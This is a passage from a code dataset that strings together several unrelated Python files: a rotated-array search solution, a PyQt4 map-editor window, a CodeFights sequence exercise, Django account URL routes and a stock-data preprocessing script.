Solution:\n def search(self, nums: List[int], target: int) -> int:\n if not len(nums):\n return -1\n left = 0\n right = len(nums) - 1\n while left < right:\n mid = left + int((right - left) / 2)\n if nums[mid] > nums[right]:\n left = mid + 1\n else:\n right = mid\n # print(left, nums[left])\n start = left\n left = 0\n right = len(nums) - 1\n if target >= nums[start] and target <= nums[right]:\n left = start\n else:\n right = start\n while left <= right:\n mid = left + int((right - left) / 2)\n # print(mid, nums[mid])\n if nums[mid] == target:\n return mid\n elif target > nums[mid]:\n left = mid + 1\n else:\n right = mid - 1\n return 
-1","repo_name":"vidhikhathuria/30-DayLeetcodingChallenge","sub_path":"leetcode0305.py","file_name":"leetcode0305.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16153631550","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui\nfrom PyQt4 import QtCore\nfrom gui.menu import menu\nfrom gui.newmapdialog import newMapDialog\nfrom gui.exportmapdialog import exportMapDialog\nfrom gui.specieslistdialog import speciesListDialog\nfrom gui.form.placedialog import formPlaceDialog\nfrom gui.form.npcdialog import formNpcDialog\nfrom gui.list.placeslist import placesList\nfrom gui.list.npclist import npcList\nfrom core import worker, config, color\nfrom core.localisation import _\nimport imghdr\nimport os\n\n\nclass mainWindow(QtGui.QMainWindow):\n\t\"\"\"\n\tClass for the main window of the application.\n\t\"\"\"\n\n\t_imageScene = None\n\t_scrollArea = None\n\t_scaleFactor = 1.0\n\n\t_isRecording = False\n\n\t_selectPixelEvent = QtCore.pyqtSignal(int, int)\n\t_selectedCellRect = None\n\t_pixmaps = dict()\n\n\t_placesWidget = None\n\t_npcWidget = None\n\t_recordingLabel = None\n\n\t_thread = None\n\n\t_selectCellSpecificAction = None\n\n\tdef __init__(self, app):\n\t\t\"\"\"\n\t\tClass constructor.\n\n\t\t@param app QtGui.QApplication Application containing the window.\n\t\t\"\"\"\n\t\tsuper(mainWindow, self).__init__()\n\t\tself._app = app\n\t\tself.addWidget = None\n\t\t#creation of the UI\n\t\tself.initUI()\n\t\tself.initSignals()\n\n\tdef initUI(self):\n\t\t\"\"\"\n\t\tInitialization of the UI:\n\t\t- creation of the menu bar,\n\t\t- creation of the status bar,\n\t\t- creation of the window's content,\n\t\t- definition of the window information (size, position),\n\t\t- display of the window.\n\t\t\"\"\"\n\t\t#top menu\n\t\tself.setMenuBar(menu(self))\n\t\tself.setStatusBar(QtGui.QStatusBar())\n\t\t#creation of the window\n\t\tself._create()\n\t\t#definition of the window information (size, position, title)\n\t\tself._setWindowInfos()\n\t\t#display the whole thing\n\t\tself.show()\n\n\tdef initSignals(self):\n\t\t\"\"\"\n\t\tMethod which initialises some signals.\n\t\tFor the moment, the only signal is the application's mapOpened,\n\t\ttriggered when a map file is opened. 
At this moment, the places' widget\n\t\tis populated to list the existing places.\n\t\t\"\"\"\n\t\tself._app.mapOpened.connect(self._placesWidget.setData)\n\t\tself._app.mapOpened.connect(self._npcWidget.setData)\n\n\tdef _create(self):\n\t\t\"\"\"\n\t\tMethod which creates the UI.\n\t\tThe window elements are created here.\n\t\tFor the moment, the window contains only a QGraphicsView displaying the\n\t\tworld's map.\n\t\t\"\"\"\n\t\tsplitter = QtGui.QSplitter()\n\t\tsplitter.setOrientation(QtCore.Qt.Orientation(QtCore.Qt.Horizontal))\n\n\t\tself._placesWidget = placesList(self, self._app)\n\t\tself._placesWidget.entityDeleted.connect(self.refreshEntity)\n\t\tself._placesWidget.entityDeleted.connect(self._app.flagAsUnsaved)\n\t\tself._placesWidget.cellDoubleClicked.connect(self.editPlace)\n\t\tself._npcWidget = npcList(self, self._app)\n\t\tself._npcWidget.entityDeleted.connect(self.refreshEntity)\n\t\tself._npcWidget.entityDeleted.connect(self._app.flagAsUnsaved)\n\t\tself._npcWidget.cellDoubleClicked.connect(self.editNpc)\n\n\t\ttabWidget = QtGui.QTabWidget()\n\t\ttabWidget.addTab(self._placesWidget, _('PLACES_TAB'))\n\t\ttabWidget.addTab(self._npcWidget, _('NPC_TAB'))\n\n\t\tself._imageScene = QtGui.QGraphicsScene()\n\t\tself._imageView = QtGui.QGraphicsView()\n\t\tself._imageView.setScene(self._imageScene)\n\n\t\tlayout = QtGui.QVBoxLayout()\n\t\tlayout.setSpacing(0)\n\t\tlayout.setMargin(0)\n\n\t\tmessageLayout = QtGui.QHBoxLayout()\n\t\tmessageLayout.setSpacing(4)\n\t\tmessageLayout.setMargin(3)\n\t\tviewTopWidget = QtGui.QWidget()\n\t\tself._recordingLabel = QtGui.QLabel(\"\")\n\t\tmessageLayout.addWidget(self._recordingLabel)\n\t\tviewTopWidget.setLayout(messageLayout)\n\n\t\tlayout.addWidget(viewTopWidget)\n\t\tlayout.addWidget(self._imageView)\n\n\t\tviewWidget = QtGui.QWidget()\n\t\tviewWidget.setLayout(layout)\n\n\t\tsplitter.addWidget(tabWidget)\n\t\tsplitter.addWidget(viewWidget)\n\t\tsplitter.setStretchFactor(1, 1)\n\n\t\tself.setCentralWidget(splitter)\n\n\tdef _setWindowInfos(self):\n\t\t\"\"\"\n\t\tDefine window information.\n\t\t\"\"\"\n\t\t# default size\n\t\tself.setGeometry(300, 300, 600, 600)\n\t\tself.setWindowTitle(_('MAIN_WINDOW_TITLE'))\n\n\tdef displayMessage(self, text):\n\t\t\"\"\"\n\t\tDisplays a message in the status bar.\n\t\t\"\"\"\n\t\tself.statusBar().showMessage(text)\n\n\tdef alert(self, message):\n\t\t\"\"\"\n\t\tMethod to display an alert message. It simply creates a critical QMessageBox.\n\t\t\"\"\"\n\t\tQtGui.QMessageBox.critical(self, _('ERROR_BOX_TITLE'), message)\n\n# Actions\n\tdef newMapAction(self):\n\t\t\"\"\"\n\t\tAction triggered when the menu's \"new\" button is pressed.\n\t\tThe user is then invited to select a map name and size.\n\t\t\"\"\"\n\t\tnewmap = newMapDialog(self, self._app)\n\n\tdef openMapAction(self):\n\t\t\"\"\"\n\t\tAction triggered when the menu's \"open\" button is pressed.\n\t\tThe user is then invited to select a map on his computer. 
The map must\n\t\tbe a picture file.\n\t\t\"\"\"\n\t\tfileName = QtGui.QFileDialog.getOpenFileName(\n\t\t\tself,\n\t\t\t_('OPEN_FILE_DIALOG_TITLE'),\n\t\t\tQtCore.QDir.currentPath(),\n\t\t\t_('MAP_FILE_TYPE %s') % \"(*.map)\"\n\t\t)\n\n\t\tif fileName == \"\":\n\t\t\treturn\n\n\t\ttry:\n\t\t\tself._app.openMap(fileName)\n\t\t\tself.openMap()\n\t\texcept BaseException as e:\n\t\t\tself.alert(e.message)\n\n\tdef saveMapAction(self):\n\t\t\"\"\"\n\t\tThis method is called when the \"Save\" button from the menu is pressed.\n\t\tIf the map's save file name is set, the map is saved in this file,\n\t\telse the \"Save as\" action is called.\n\t\t\"\"\"\n\t\tif self._app.getSaveFileName() is None:\n\t\t\treturn self.saveMapAsAction()\n\t\telse:\n\t\t\tself._app.saveMap()\n\t\t\treturn True\n\n\tdef saveMapAsAction(self):\n\t\t\"\"\"\n\t\tThis method asks the user to select a file on his computer, and then\n\t\tsave the map in this file.`\n\t\t\"\"\"\n\t\tfileName = QtGui.QFileDialog.getSaveFileName(\n\t\t\tself,\n\t\t\t_('SAVE_FILE_DIALOG_TITLE'),\n\t\t\tQtCore.QDir.currentPath(),\n\t\t\t_('MAP_FILE_TYPE %s') % \"(*.map)\"\n\t\t)\n\n\t\tif fileName == \"\":\n\t\t\treturn False\n\n\t\tif fileName[-4:] != '.map':\n\t\t\tfileName = fileName + '.map'\n\n\t\tself._app.setSaveMapName(fileName)\n\t\tself._app.saveMap()\n\t\treturn True\n\n\tdef listSpeciesAction(self):\n\t\t\"\"\"\n\t\tMethod called to display a dialog listing the map's species.\n\t\t\"\"\"\n\t\tspecieswindow = speciesListDialog(self, self._app)\n\t\tspecieswindow.show()\n\n\tdef zoomInMapAction(self):\n\t\t\"\"\"\n\t\tWrapper method to zoom in the map, calls scaleImage().\n\t\t\"\"\"\n\t\tself._scaleFactor *= 1 + config.zoomDelta\n\t\tself.scaleImage()\n\n\tdef zoomOutMapAction(self):\n\t\t\"\"\"\n\t\tWrapper method to zoom out the map, calls scaleImage().\n\t\t\"\"\"\n\t\tself._scaleFactor *= 1 - config.zoomDelta\n\t\tself.scaleImage()\n\n\tdef exportMapAction(self, customAction=None):\n\t\t\"\"\"\n\t\tMethod to export a map.\n\t\tWill check if the map can be exported, and if it is, the export will be\n\t\trun and a dialog will be displayed with a progress bar to show the\n\t\texport progression.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tself._app.map.checkForExport()\n\t\texcept BaseException as e:\n\t\t\tself.alert(e.message)\n\t\t\treturn\n\n\t\texportDialog = exportMapDialog(self)\n\n\t\tself._thread = worker.exporterThread(self._app)\n\t\tif customAction is not None:\n\t\t\tself._thread.finished.connect(customAction)\n\t\tself._thread.finished.connect(exportDialog.close)\n\t\tself._thread.exportError.connect(self.alert)\n\n\t\texportDialog.setThread(self._thread)\n\t\tself._thread.start()\n\n\tdef setAsDefaultAction(self):\n\t\t\"\"\"\n\t\tDefine the map as default map. 
The map must already be exported.\n\t\tIf the map is not exported, the user is asked to export it.\n\t\t\"\"\"\n\t\tif self._app.isExported() is False:\n\t\t\tmsgBox = QtGui.QMessageBox()\n\t\t\tmsgBox.setWindowTitle(_('SET_AS_DEFAULT_QUESTION'))\n\t\t\tmsgBox.setText(_('ERROR_EXPORT_NEEDED'))\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('YES_BUTTON')), QtGui.QMessageBox.AcceptRole)\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('NO_BUTTON')), QtGui.QMessageBox.RejectRole)\n\t\t\tret = msgBox.exec_()\n\n\t\t\tif ret == QtGui.QMessageBox.AcceptRole:\n\t\t\t\tself.exportMapAction(self._app.setAsDefault)\n\t\t\treturn\n\n\t\tself._app.setAsDefault()\n# End Actions\n\n# Actions to interact on the map to add elements\n\tdef recordSelectStartCell(self):\n\t\t\"\"\"\n\t\tMethod called when the user has to select a starting cell. A record mode\n\t\twill be enabled and the user will have to click on a cell in the map.\n\t\t\"\"\"\n\t\tif self.isRecording():\n\t\t\tself.disableRecordingMode()\n\n\t\tself._selectCellSpecificAction = self.selectStartCell\n\t\tself.enableRecordingMode(_('RECORDING_START_CELL_MESSAGE'))\n\n\tdef recordAddPlaceCell(self):\n\t\t\"\"\"\n\t\tMethod called when the user has to select a cell to add a place in the\n\t\tworld. A record mode will be enabled and the user will have to click on\n\t\ta cell in the map\n\t\t\"\"\"\n\t\tif self.isRecording():\n\t\t\tself.disableRecordingMode()\n\n\t\tself._selectCellSpecificAction = self.addPlace\n\t\tself.enableRecordingMode(_('RECORDING_PLACE_MESSAGE'))\n\n\tdef recordAddNpcCell(self):\n\t\t\"\"\"\n\t\tMethod called when the user has to select a cell to add a NPC in the\n\t\tworld. A record mode will be enabled and the user will have to click on\n\t\ta cell in the map\n\t\t\"\"\"\n\t\tif self.isRecording():\n\t\t\tself.disableRecordingMode()\n\n\t\tself._selectCellSpecificAction = self.addNpc\n\t\tself.enableRecordingMode(_('RECORDING_NPC_MESSAGE'))\n# End Actions to interact on the map to add elements\n\n# Recording methods\n\tdef isRecording(self):\n\t\t\"\"\"\n\t\tMethod to know if the recording mode is enabled.\n\t\t\"\"\"\n\t\treturn self._isRecording\n\n\tdef enableRecordingMode(self, message):\n\t\t\"\"\"\n\t\tMethod to enable the recording mode.\n\t\t\"\"\"\n\t\tself._isRecording = True\n\t\tself._recordingLabel.setText(message)\n\t\tself._selectPixelEvent.connect(self.selectCell)\n\n\t\tif self._selectCellSpecificAction is not None:\n\t\t\tself._selectPixelEvent.connect(self._selectCellSpecificAction)\n\n\n\tdef disableRecordingMode(self):\n\t\t\"\"\"\n\t\tMethod to disable the recording mode.\n\t\t\"\"\"\n\t\tself._isRecording = False\n\t\tself._recordingLabel.setText(\"\")\n\t\tif self._selectCellSpecificAction is not None:\n\t\t\tself._selectPixelEvent.disconnect(self._selectCellSpecificAction)\n\t\t\tself._selectCellSpecificAction = None\n\t\tself._selectPixelEvent.disconnect(self.selectCell)\n\n# End Recording methods\n\n# Map operations\n\tdef openMap(self):\n\t\t\"\"\"\n\t\tMethod to open a map from a filename\n\t\t\"\"\"\n\t\tfileName = self._app.getMapFileName() + '.bmp'\n\n\t\timage = QtGui.QImage(fileName)\n\t\tif image is None or imghdr.what(str(fileName)) != \"bmp\":\n\t\t\tQtGui.QMessageBox.information(\n\t\t\t\tself,\n\t\t\t\t_('IMAGE_VIEWER'),\n\t\t\t\t_('ERROR_OPEN_%s') % (fileName)\n\t\t\t)\n\t\t\treturn\n\n\t\tself._imageScene.clear()\n\t\tmapPixmap = QtGui.QPixmap.fromImage(image)\n\t\tmapPixmap = QtGui.QGraphicsPixmapItem(mapPixmap, None, self._imageScene)\n\t\tmapPixmap.mousePressEvent = 
self.pixelSelect\n\n\t\tself._pixmaps = dict()\n\t\tself._pixmaps['map'] = mapPixmap\n\n\t\tself.refreshEntities()\n\n\t\tif self._app.map.startCellPosition is not None:\n\t\t\tself.displayStartCell(self._app.map.startCellPosition[0], self._app.map.startCellPosition[1])\n\n\t\tself._scaleFactor = 1.0\n\n\t\tself.menuBar().mapOpened.emit()\n\n\t\tif self._app.getSaveFileName() is None:\n\t\t\tself._app.flagAsUnsaved()\n\n\tdef scaleImage(self):\n\t\t\"\"\"\n\t\tMethod to resize the map after a zoom action.\n\t\tOnce the map is resized, if the scale factor is lower or equal than\n\t\t0.75, the zoom out button is disabled and if the scale factor is higher\n\t\tor equal than 30.0, the zoom in button is disabled.\n\t\t\"\"\"\n\t\tself._imageView.resetTransform()\n\t\ttransform = self._imageView.transform()\n\t\ttransform.scale(self._scaleFactor, self._scaleFactor)\n\t\tself._imageView.setTransform(transform)\n\n\t\tself.menuBar().mapZoomed.emit(self._scaleFactor)\n\n\tdef pixelSelect(self, event):\n\t\t\"\"\"\n\t\tAction called when the map is clicked, to get the clicked pixel.\n\t\t\"\"\"\n\t\t(x, y) = (int(event.pos().x()), int(event.pos().y()))\n\t\tself._selectPixelEvent.emit(x, y)\n\n\tdef centerMapOnCoordinates(self, coordinates):\n\t\t\"\"\"\n\t\tThis method does a maximum zoom on a selected cell of the map.\n\t\t\"\"\"\n\t\tself._imageView.fitInView(coordinates[0] - 1, coordinates[1] - 1, 3, 3)\n\t\tself._scaleFactor = config.scaleFactor\n\t\tself.scaleImage()\n\n\tdef selectCell(self, x, y):\n\t\t\"\"\"\n\t\tThis method is called when the record mode is enabled and a cell of\n\t\tthe map is clicked. At this moment, the cell is highlighted with a\n\t\tblack border arround it.\n\t\t\"\"\"\n\t\tif self._selectedCellRect is not None:\n\t\t\tself.unselectCell()\n\n\t\tself._selectedCellRect = QtGui.QGraphicsRectItem(x, y, 1, 1, None, self._imageScene)\n\t\tself._selectedCellRect.setBrush(QtGui.QBrush(color.getColorFromConfig('selected-cell', color.COLOR_BRUSH)))\n\t\tself._selectedCellRect.setPen(QtGui.QPen(color.getColorFromConfig('selected-cell', color.COLOR_PEN)))\n\n\tdef unselectCell(self):\n\t\t\"\"\"\n\t\tMethod to remove the pixel of the previously selected cell.\n\t\t\"\"\"\n\t\tself._imageScene.removeItem(self._selectedCellRect)\n\t\tself._selectedCellRect = None\n# End Map operations\n\n# Methods to add elements on the map\n\tdef selectStartCell(self, x, y):\n\t\t\"\"\"\n\t\tMethod called when the user click on a cell in the map to select a\n\t\tstarting cell.\n\t\t\"\"\"\n\t\ttry:\n\t\t\tself._app.map.setStartCellPosition((x, y))\n\t\t\tself.displayStartCell(x, y)\n\t\t\tself._app.flagAsUnsaved()\n\t\texcept BaseException as e:\n\t\t\tself.alert(e.message)\n\t\t\treturn\n\n\t\tself.disableRecordingMode()\n\n\tdef addPlace(self, x, y):\n\t\t\"\"\"\n\t\tMethod called when the user click on a cell in the map to add a place.\n\t\t\"\"\"\n\n\t\tif not self._app.map.isCellOnLand((x, y)):\n\t\t\tself.alert(_('ERROR_PLACE_IN_WATER'))\n\t\t\treturn\n\n\t\tdialog = formPlaceDialog(self, self._app, coordinates=(x, y))\n\t\tdialog.entityAdded.connect(self.unselectCell)\n\t\tdialog.entityAdded.connect(self.displayEntity)\n\t\tdialog.entityAdded.connect(self._placesWidget.setData)\n\t\tdialog.entityAdded.connect(self._app.flagAsUnsaved)\n\n\t\tself.disableRecordingMode()\n\n\tdef editPlace(self, place):\n\t\t\"\"\"\n\t\tMethod called when the user double clicks on a place in the list.\n\t\t\"\"\"\n\t\trow = self._placesWidget.getRowValues(place)\n\t\tself.selectCell(row['x'], 
row['y'])\n\t\tdialog = formPlaceDialog(self, self._app, row=row)\n\t\tdialog.entityUpdated.connect(self.unselectCell)\n\t\tdialog.entityUpdated.connect(self.refreshEntity)\n\t\tdialog.entityUpdated.connect(self._placesWidget.setData)\n\t\tdialog.entityUpdated.connect(self._app.flagAsUnsaved)\n\n\tdef addNpc(self, x, y):\n\t\t\"\"\"\n\t\tMethod called when the user click on a cell in the map to add a NPC.\n\t\t\"\"\"\n\t\tif not self._app.map.isCellOnLand((x, y)):\n\t\t\tself.alert(_('ERROR_NPC_IN_WATER'))\n\t\t\treturn\n\n\t\tdialog = formNpcDialog(self, self._app, coordinates=(x, y))\n\t\tdialog.entityAdded.connect(self.unselectCell)\n\t\tdialog.entityAdded.connect(self.displayEntity)\n\t\tdialog.entityAdded.connect(self._npcWidget.setData)\n\t\tdialog.entityAdded.connect(self._app.flagAsUnsaved)\n\n\t\tself.disableRecordingMode()\n\n\tdef editNpc(self, npc):\n\t\t\"\"\"\n\t\tMethod called when the user double clicks on a npc in the list.\n\t\t\"\"\"\n\t\trow = self._npcWidget.getRowValues(npc)\n\t\tself.selectCell(row['x'], row['y'])\n\t\tdialog = formNpcDialog(self, self._app, row=row)\n\t\tdialog.entityUpdated.connect(self.unselectCell)\n\t\tdialog.entityUpdated.connect(self.refreshEntity)\n\t\tdialog.entityUpdated.connect(self._npcWidget.setData)\n\t\tdialog.entityUpdated.connect(self._app.flagAsUnsaved)\n# End Methods to add elements on the map\n\n# Methods to display an element on the map\n\tdef refreshEntities(self):\n\t\tfor e in self._app.map.entities.keys():\n\t\t\tself.refreshEntity(e)\n\n\tdef refreshEntity(self, entityType):\n\t\tentityType = str(entityType)\n\t\tif entityType in self._pixmaps.keys():\n\t\t\tself._cleanScene(self._pixmaps[entityType])\n\t\t\tdel self._pixmaps[entityType]\n\t\tfor p in self._app.map.entities[entityType].values():\n\t\t\tself.displayEntity(entityType, p['x'], p['y'])\n\n\tdef displayEntity(self, entityType, x, y):\n\t\t\"\"\"\n\t\tThis method creates a pixmap in the map for each desired entity of the map.\n\t\t\"\"\"\n\t\tentityType = str(entityType)\n\t\tif entityType not in self._pixmaps.keys():\n\t\t\tself._pixmaps[entityType] = list()\n\n\t\trect = QtGui.QGraphicsRectItem(x, y, 1, 1, None, self._imageScene)\n\t\trect.setBrush(QtGui.QBrush(color.getColorFromConfig(entityType, color.COLOR_BRUSH)))\n\t\trect.setPen(QtGui.QPen(color.getColorFromConfig(entityType, color.COLOR_PEN)))\n\t\tself._pixmaps[entityType].append(rect)\n\n\tdef _cleanScene(self, pixmapsList):\n\t\tfor p in pixmapsList:\n\t\t\tself._imageScene.removeItem(p)\n\n\tdef displayStartCell(self, x, y):\n\t\t\"\"\"\n\t\tHere the start cell is displayed in the map, as a new pixmap\n\t\t\"\"\"\n\t\tif 'start-cell' in self._pixmaps.keys():\n\t\t\tself._imageScene.removeItem(self._pixmaps['start-cell'])\n\t\t\tself._pixmaps['start-cell'] = None\n\n\t\trect = QtGui.QGraphicsRectItem(x, y, 1, 1, None, self._imageScene)\n\t\trect.setBrush(QtGui.QBrush(color.getColorFromConfig('start-cell', color.COLOR_BRUSH)))\n\t\trect.setPen(QtGui.QPen(color.getColorFromConfig('start-cell', color.COLOR_PEN)))\n\t\tself._pixmaps['start-cell'] = rect\n# End Methods to display an element on the map\n\n\tdef exit(self):\n\t\t\"\"\"\n\t\tOn exit, if the map is not saved, the user is prompted to save it or\n\t\tcancel or discard the changes\n\t\t\"\"\"\n\t\tif self._app.hasUnsavedChanges():\n\t\t\tmsgBox = QtGui.QMessageBox()\n\t\t\tmsgBox.setWindowTitle(_('UNSAVED_CHANGES'))\n\t\t\tmsgBox.setText(_('CLOSE_WITH_UNSAVED_CHANGES'))\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('SAVE_BUTTON')), 
QtGui.QMessageBox.AcceptRole)\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('DISCARD_BUTTON')), QtGui.QMessageBox.DestructiveRole)\n\t\t\tmsgBox.addButton(QtGui.QPushButton(_('CANCEL_BUTTON')), QtGui.QMessageBox.RejectRole)\n\t\t\tret = msgBox.exec_()\n\n\t\t\t# This is not logical, I would have expected to have to use\n\t\t\t# RejectRole, but this one seems to do the job...\n\t\t\tif ret == QtGui.QMessageBox.DestructiveRole:\n\t\t\t\treturn\n\t\t\telif ret == QtGui.QMessageBox.AcceptRole and self.saveMapAction() is False:\n\t\t\t\treturn\n\t\tQtGui.qApp.quit()\n","repo_name":"rrpg/world-editor","sub_path":"gui/mainwindow.py","file_name":"mainwindow.py","file_ext":"py","file_size_in_byte":17158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25312952434","text":"#!/bin/python3\nimport sys\n\"\"\"\n# Description\n# \n# Given a sequence of integers as an array, determine whether it is possible to\n# obtain a strictly increasing sequence by removing no more than one element \n# from the array.\n#\n# Example:\n# \n# For sequence = [1, 3, 2, 1], the output should be\n# almostIncreasingSequence(sequence) = false;\n#\n# There is no one element in this array that can be removed in order to get a \n# strictly increasing sequence.\n#\n# For sequence = [1, 3, 2], the output should be\n# almostIncreasingSequence(sequence) = true.\n#\n# You can remove 3 from the array to get the strictly increasing sequence \n# [1, 2]. Alternately, you can remove 2 to get the strictly increasing sequence\n# [1, 3].\n#\n# Input Format\n#\n# array.integer sequence\n# 2 ≤ sequence.length ≤ 10**5\n# -10**5 ≤ sequence[i] ≤ 10**5\n#\n# Output Format \n#\n# Return true if it is possible to remove one element from the array in order \n# to get a strictly increasing sequence, otherwise return false.\n#\n# Solution:\n# Solution 1 involves using numpy, but when attempting to use it in\n# codefights, it says that numpy module cannot be found.\n#\n# Solution 2 and 3 does not use numpy and passes 32 of 34 test cases, but times\n# out on test case 33. According to comments, this test case has 1000's of items\n# so creating a new list with each iteration is probably causing the timeout.\n#\n# Solution 4 simply goes through the list of integers one time making \n# comparisons to ensure that it is increasing, and increasing a failure \n# counter for cases where it does not. This passes all test cases.\n#\n# Solution 5 is not my solution, but was in the comments. 
It is close to my\n# solution 4, but less code and a bit more elegant.\n\"\"\"\n##############\n# SOLUTION 1 #\n##############\n#import numpy as np\n#\n#def monotonic(x):\n# dx = np.diff(x)\n# return np.all(dx >= 0)\n## return np.all(dx <= 0) or np.all(dx >= 0)\n#\n#def almostIncreasingSequence(sequence):\n# for i in range(len(sequence)):\n# tmp = list(sequence)\n# tmp.pop(i)\n# if monotonic(tmp) == True:\n# return True\n# return False\n# \n#print(almostIncreasingSequence([1,3,2,1])) \n#print(almostIncreasingSequence([1,3,2])) \n \n\n##############\n# SOLUTION 2 #\n##############\n#def strictly_increasing(L):\n# return all(x sequence[i-1]:\n prev = sequence[i+1]\n else:\n prev = sequence[i]\n if sequence[i+2] <= prev:\n numFail += 1\n else:\n prev = sequence[i]\n if numFail > 1:\n return False\n else:\n prev = sequence[i+1]\n\n return True\n\n##############\n# SOLUTION 5 #\n##############\n#def almostIncreasingSequence(sequence): \n# count_decreasing_sq = 0\n# for i in range(len(sequence) - 1):\n# if sequence[i+1] <= sequence[i]:\n# count_decreasing_sq += 1\n# if (i >= 1) and (sequence[i+1] <= sequence[i-1]):\n# if (len(sequence) - 2 > i) and (sequence[i+2] <= sequence[i]):\n# count_decreasing_sq += 1\n# if count_decreasing_sq > 1:\n# return False\n# \n# return True\n\n\n\n \nprint(almostIncreasingSequence([1,3,2,1])) # False\nprint(almostIncreasingSequence([1,3,2])) # True\nprint(almostIncreasingSequence([2,3,1,3])) # False\nprint(almostIncreasingSequence([1,3,1,2])) # False\nprint(almostIncreasingSequence([10,1,2,3,4,5])) # True\nprint(almostIncreasingSequence([1,2,3,4,5,6])) # True\nprint(almostIncreasingSequence([3,5,3,6])) # True\nprint(almostIncreasingSequence([1,2,5,3,4,5])) # True\nprint(almostIncreasingSequence([1,2,5,5,5])) # False","repo_name":"henrypj/codefights","sub_path":"Intro/02-EdgeOfTheOcean/almostIncreasingSequence.py","file_name":"almostIncreasingSequence.py","file_ext":"py","file_size_in_byte":4974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16335521285","text":"from django.urls import path\nfrom . 
import views\nfrom rest_framework.authtoken.views import obtain_auth_token\n\napp_name=\"accounts\"\n\n\nurlpatterns = [\n path('address/create', views.api_add_address, name=\"Creat_Address\"),\n path('address//delete', views.api_delet_address, name=\"Delete_Address\"),\n path('address//edit', views.api_edit_address, name=\"edit_Address\"),\n path('address/', views.api_get_address, name=\"One_Address\"),\n path('address', views.GetAllAddress, name=\"All_Address\"),\n\n path('user/create', views.CreatUser, name=\"CreatUser\"),\n path('user/login', obtain_auth_token, name=\"login\"),\n path('user/info', views.GET_User, name=\"GET_User\"),\n path('user/update', views.Edit_User, name=\"Edit_User\"),\n]","repo_name":"seif-elden/e-commerce-API","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24780058055","text":"import os\nimport pathlib\nimport json\nimport warnings\n\nimport pandas as pd\nimport numpy as np\n\n# Load the data\npath = pathlib.Path(__file__).resolve().parent / \"0_raw data\"\ndf = pd.read_csv(\n os.path.join(path, \"raw_fundamental.csv\"),\n index_col=[0, 1],\n parse_dates=[\"Date\", \"Period_beginning\"],\n)\n# Select stocks and features based on results of data validation\nwith open(\"preprocessing_metadata/metadata_raw_data.json\") as f:\n metadata = json.loads(f.read())\n stocks_to_keep = set(metadata[\"Stocks\"])\n features_to_keep = set(metadata[\"Fundamental features\"])\n# Add some features needed for feature engineering later on\nfeatures_to_keep = features_to_keep.union(\n [\n \"commonStockSharesOutstanding\",\n \"totalCurrentAssets\",\n \"totalRevenue\",\n \"netIncomeApplicableToCommonShares\",\n \"totalCashFromOperatingActivities\",\n \"totalAssets\",\n \"totalLiab\",\n \"longTermDebt\",\n \"shortTermDebt\",\n \"totalStockholderEquity\",\n \"interestExpense\",\n ]\n)\ndf = df.copy().loc[:, features_to_keep]\n# Drop duplicate index\ndf = df[~df.index.duplicated(keep=\"first\")]\n# Drop stocks with too many missing values\ndf = df.copy().loc[stocks_to_keep]\n# Infs to Nans\nprint(\"Fundamental\")\nprint(df.isin([np.inf, -np.inf]).sum().sum(), \" Infs replaced to Nans\")\ndf = df.replace([np.inf, -np.inf], np.nan)\n# Forward filling\nprint(\"Before ffilling: \", df.isnull().sum().sum(), \" Nans\")\ndf = df.groupby(by=\"Stock\").ffill()\nprint(\"After ffilling: \", df.isnull().sum().sum(), \" Nans\")\n# Feature engineering\ndf.loc[:, \"ReturnOnEquity\"] = np.divide(\n df[\"netIncome\"].astype(\"float\"), df[\"totalStockholderEquity\"].astype(\"float\")\n)\ndf.loc[:, \"ebit\"] = (\n df[\"netIncome\"].astype(\"float\")\n + df[\"interestExpense\"].astype(\"float\")\n + df[\"incomeTaxExpense\"].astype(\"float\")\n)\ndf.loc[:, \"Debt\"] = df[\"shortTermDebt\"].astype(\"float\") + df[\"longTermDebt\"].astype(\n \"float\"\n)\n# One-hot-encode categorical columns. The way below might not be the most appropiate way but does the job for now\nif \"Period_beginning\" in df.columns:\n df.loc[:, \"Period_beginning\"] = pd.DatetimeIndex(df[\"Period_beginning\"]).month\n# Data validation of the engineered features\nif df.loc[:, \"ReturnOnEquity\"].isin([np.inf, -np.inf]).sum().sum() > 0:\n df.loc[:, \"ReturnOnEquity\"] = (\n df[\"ReturnOnEquity\"]\n .replace([np.inf, -np.inf], np.nan)\n .groupby(by=\"Stock\")\n .ffill()\n )\n warnings.warn(\n \"One of the fundamental features engineered had inf values: ReturnOnEquity. 
Infs replaced with NaNs and forward-filled.\"\n )\n# Save names of the engineered features so as not to drop them later on\nnew_columns = [\"ReturnOnEquity\", \"ebit\", \"Debt\"]\nwith open(\"preprocessing_metadata/engineered_features_fndmt.json\", \"w\") as f:\n json.dump({\"EngineeredFeatures\": new_columns}, f, indent=4)\n# Save the data\npath = pathlib.Path(__file__).resolve().parent / \"1_processed data\"\npath.mkdir(parents=True, exist_ok=True)\ndf.to_csv(os.path.join(path, \"1_preprocessed_fundamental.csv\"))\n","repo_name":"PbVrCt/time-series-pipeline","sub_path":"3_1_preprocessingFNDMT.py","file_name":"3_1_preprocessingFNDMT.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"39727390057","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author: wxnacy@gmail.com\n\"\"\"\n\n\"\"\"\nimport pygments\n\nfrom pygments.lexers.python import PythonLexer\nfrom prompt_toolkit.formatted_text import PygmentsTokens\nfrom prompt_toolkit import print_formatted_text\n\nfrom csarg import CommandArgumentParser\nfrom csarg import CommandArgumentParserFactory\n\nfrom goss.loggers import get_logger\nfrom goss.cli.run_mode import RUN_MODE\n\nclass CommandArgumentParserFactory(CommandArgumentParserFactory):\n 